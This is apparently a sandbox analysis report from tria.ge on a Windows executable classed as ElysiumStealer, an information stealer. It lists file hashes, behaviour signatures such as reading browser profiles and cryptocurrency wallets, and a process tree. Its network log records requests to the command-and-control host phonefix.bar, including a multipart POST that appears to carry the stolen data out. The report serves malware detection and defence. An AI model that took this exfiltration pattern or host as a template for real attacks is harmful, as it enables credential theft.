Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
139s -
platform
windows7_x64 -
resource
win7-en -
submitted
13/09/2021, 11:18 UTC
Static task
static1
Behavioral task
behavioral1
Sample
36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe
Resource
win7-en
Behavioral task
behavioral2
Sample
36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe
Resource
win10v20210408
General
-
Target
36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe
-
Size
80KB
-
MD5
3d330c6e2e14c3e682aec36e1abeb028
-
SHA1
59665acd4f6398afb4d5ab515e95a886648f161c
-
SHA256
36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce
-
SHA512
e4c5b6570d3823f985e5516dbb9917f3c9c3ccd7a780de1e7cd179f7f338f0d0579e62d988898ae7002e774daec3bf6a29d5d87b5e70cb43e6b06ad627e984c3
Malware Config
Signatures
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1420 1032 WerFault.exe 25 -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1032 36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe 1420 WerFault.exe 1420 WerFault.exe 1420 WerFault.exe 1420 WerFault.exe 1420 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1420 WerFault.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1032 36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe Token: SeDebugPrivilege 1420 WerFault.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1032 wrote to memory of 1420 1032 36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe 31 PID 1032 wrote to memory of 1420 1032 36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe 31 PID 1032 wrote to memory of 1420 1032 36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe 31 PID 1032 wrote to memory of 1420 1032 36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe"C:\Users\Admin\AppData\Local\Temp\36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 18322⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
Network
-
Remote address:8.8.8.8:53Requestphonefix.barIN AResponsephonefix.barIN A104.21.10.67phonefix.barIN A172.67.131.66
-
GEThttps://phonefix.bar/api.php?getusers36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exeRemote address:104.21.10.67:443RequestGET /api.php?getusers HTTP/1.1
Host: phonefix.bar
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B77KaJsjG7I9MrH%2BJw1rwXOacKyhQmP4USoafNuuI8dvx2dR6efQkrbW3Xpp3vv%2F7gnHphlmHGmP7TecQVDNTPyhob6PKEJMFByMA8Cs37%2Fnl9KzGqBKwlocn7brM8Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68e0f963c9ffc82b-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
GEThttps://phonefix.bar/api.php36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exeRemote address:104.21.10.67:443RequestGET /api.php HTTP/1.1
Host: phonefix.bar
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lX65FQy0KDqsK3OLMMAbZnyGo5FUo9Ka7y5ODe3b4SGTEhzlj5EBIMNfNs0MY5YdY6jWLFN79%2BWtUJhe%2BVMVSO3V%2FPhWjO5NToh6HCHOryQ4YB38bYL%2FuSXzUkUU1rs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68e0f97c280cc82b-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
Remote address:104.21.10.67:443RequestPOST / HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8d976a8b1920f30
Host: phonefix.bar
Content-Length: 3563
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yx8Kib4i%2BVdcOiE1i8pmCLUQP5t%2BGSVpATDDOCN2%2B%2FEdGLAFCB9inGGAqagpRcsFanuZfoAaAYGqBWf%2FaHLQwR5xDx7hRPngB%2FDD228rG7udBJrEqC0EQ4ll6hAJraQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68e0f97f6af0c82b-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
104.21.10.67:443https://phonefix.bar/tls, http36b8ee01443c30439196c527d6826884de2e6cd8d5537b8b1a44ede24c55c6ce.exe40.7kB 2.2MB 794 1523
HTTP Request
GET https://phonefix.bar/api.php?getusersHTTP Response
200HTTP Request
GET https://phonefix.bar/api.phpHTTP Response
200HTTP Request
POST https://phonefix.bar/HTTP Response
200